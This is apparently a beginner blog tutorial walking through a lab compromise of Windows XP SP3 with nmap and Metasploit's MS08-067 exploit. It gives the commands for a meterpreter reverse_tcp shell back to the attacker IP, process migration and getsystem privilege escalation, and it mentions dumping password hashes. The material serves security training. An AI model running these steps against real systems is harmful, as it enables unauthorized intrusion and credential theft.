Basic Introduction to Metasploit Framework
Hey Guys, are you ready for owning our first machine?
Yes, today we go together in the word of ethical hacking, we try to exploit our first machine, but not like a script kiddies, but with the five step of professional pentest… yes the machine has onboard an old operating system, yes the exploit is also old, but I hope you understand all our step and, with patience and study, you can exploit in the same manner newer machine….
For this lab I use an old Windows XP Sp3 italian and my favorite attacking machine with Backtrack 5R3 x64, the Ip address of the target is 192.168.254.11/24 and my IP is 192.168.254.3/24. This article is for beginner for this reason only to word to set attacker IP address, BT 5 R3 has a dhcp client deamon dhclient3 started by default, but I can set my IP statically with three simple commands:
Ifconfig eth0 192.1689.254.3/24 → for setting IP and subnet
route add default gw 192.168.254.254 → for setting default gateway
Figure 2. Start dhcp client
echo nameserver 8.8.8.8 > /etc/resolv.conf → for setting the DNS server, now I will use google DNS server
You can stop the dhco client service with → killall dhclient3 without this command you can loose your IP when the dhclient timeot end and the daemon start with a new dhcpdiscover.
If you prefer dhcp, you can force the process with the command → dhclient3 (Figure 2).
For a more realistic environment I have installed in the target machine Avast free antivirus ed.2012 with the last signature database (Figure 3).
Normally I use Vmware Workstation for my labs, today I am using the version 9.0.1, no matter for network setup, now I work in bridged mode, but you can use your preferred configuration, the only issue is to set all virtual machine in the same manner.
Now I will work in professional way, like ethical hackers and not a black hat, for do this I need to respect ROE (role of engagement) for ensure SLA (service level agreement), but this is not enough, to ensure metrics and repeatability we need to use a well known methodology, is out of scope of this article explain in detail complex methodology like OSTMM, but the more simple methodology is the use of five step; two step of pre-attack phase, the attack phase and other two step of post-attack phase.
Step 1 – Scanning
For this purpose I use nmap, in my opinion nmap is the better choice for network scanning, you can scan the network in many way, but if your ROE in- clude low noise you can’t use the scanner with all default settings, like:
nmap 192.168.254.11 (just only for timing, I work with the single IP and not with the entire subnet)If I use all nmap defaults I will scan 1000 port (http://nmap.org/book/man-port-specification.html) with T3 timing, with T3 nmap include parallelization of scanned ports (T0 wait 5 min. between sending each probe, T1 wait 15 sec. and T2 wait 04 sec. – http://nmap.org/book/man-performance.html), for a more stealth scan I choose only few port, in my example the ports 80,139,445,21 and 3389 and I
Figure 4. Scanning with nmap
Figure 5. smb-check-vulns script
nmap 192.168.254.11 -p 80,139,445,21,3389 -sV -O -T3
The first interesting information is the ports 139 and 445 are open, and nmap try also to discover the Operating System version
OS CPE: cpe:/o:microsoft:windows_xp::sp3 OS details: Microsoft Windows XP SP3
Mmmmh, if you are an experienced pentester the couple winXp and port 139(or 445) Tcp open sug- gests an SMB vulnerability…ok, go deeper using nmap scripts…
Step 2 – Enumeration
We have a lot of tools and techniques for enumeration, if you are very aggressive, you can use Nessus or OpenVas or other vulnerability assessment tools, for this demo I will use some NSE scripts, NSE is Nmap Scripting Engine, this kind of scripts can hel you in a lot of situation, if you want to know more about nse scripts you can
Figure 6. smb-os-discovery script
Figure 7. Run nmap scripts
My string become:
nmap 192.168.254.11 -p 139 --script=smb-osdiscovery,smb-check-vulns --script-args=unsafe=1
After the scripts execution I can see witch the target machine are vulnerable to MS08-067 SMB re- mote buffer overflow, now I try to gain access in to the target machine.
Figure 8. Search exploit with google http://www.metasploit. com/modules/exploit/windows/smb/ms08_067_netapi
Figure 9. Exploit description in metasploit.com
If you are a n00b is possible who you don’t know what is MS08-067… this is a GREAT exploit, just a little bit older, but great, you can use this exploit a lot of times even if you are using it against a machine already compromised, if the exploit crash, no problem you can re-use again, the next SMB exploit, the SMB exploit MS09-050 is also a good exploit, but some time you can get BSOD, if your session crash you aren’t able to compromise again the target unless the machine was rebooted… no, the MS08-067 is not like this… you can use it as many times as you want in any way you want ... of course if the service is started: D.
But if you don’t know this exploit… google is your friend… if I put my question in google: "metasploit ms08 067 netapi" you can get the page in metasploit.com site (Figure 8-10)…
As you can see, this exploit work with a lot of operating system from windows 2000 universal to windows XP sp3, the exploit has also the default option “automatic targeting”…great…
Now I can start metaploit in my attacking machine, in my installation metasploit is in /git/ metasploit/metasploit-framework if your path is different you need to modify the change directory operation…In my machine:
Figure 10. Target OS for my exploit
cd /git/metasploit/metasploit-framework search ms08-067Is also possible witch your metasploit path was in executable’s path, in this case you need only to call metasploit console…
OK, now I am in the correct directory and I can start msfconsole, my preferred metasploit interface:
./msfconsole ( if you are invoking metasploit console from another directory because the binary is in the executable search path you must type only msfconsole without the “./”; Figure 11).
Now, if I don’t know where the exploit is, I can search with the command:
Figure 11. Starting msfconsole
Figure 12. Searching exploit in metasploit
Figure 13. Exploit info
set my exploit and with the command info I can have, more or less, the same output of the web page of the Figures 13 and 14.
I need to set my payload and other required options, if I can I use meterpreter, and the revers payloads are very usefull , you can also choose payload like reverse_http that comply with protocolrequirement https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreterhttphttps-communication:
Figure 14. Exploit info – cont
Figure 15. Setting exploit
Figure 16. Gotcha
set PAYLOAD windows/meterpreter/reverse_tcp set RHOST 192.168.254.11
set LHOST 192.168.254.3
RHost is the target machine, lhost is the machine where I want to go the reverse shell.
With show options I can verify my settings and with exploit I can run my exploit.
In real word I use exploit –j because with this option you can force the active module to the background (Figure 15 and 16).
Figure 17. Start interaction
Figure 18. Target processes
Figure 19. Migrate to another process
Figure 20. Password hashes
….mmmmhh… it is not so simple… you have still a long way… but this is your first 0wning… this is the beginning… now you can interact with your session using the command:
sessions –i 1
With getuid you can show your current user and with getpid you can see your process id, the command ps is for showing the processes, at this point you can migrate from your current process to an
Figure 21. Oops
Figure 22. Avast wins
Figure 23. Ok, try again
Figure 24. Uninstall metsvc
other…in this case I want to migrate to explorer process, this is a good process, normally the users don’t kill explorer until the machine turn off.
In my example explorer has PID 1084 and I type:
migrate 1084
If I need system privilege I can try privilege escalation with getsystem command.
Figure 25. Avast processes
Figure 26. Trying another way
Figure 27. Avast 2 – Persistence 0
Figure 28. Go to RDP
To Be Continuous
No comments:
Post a Comment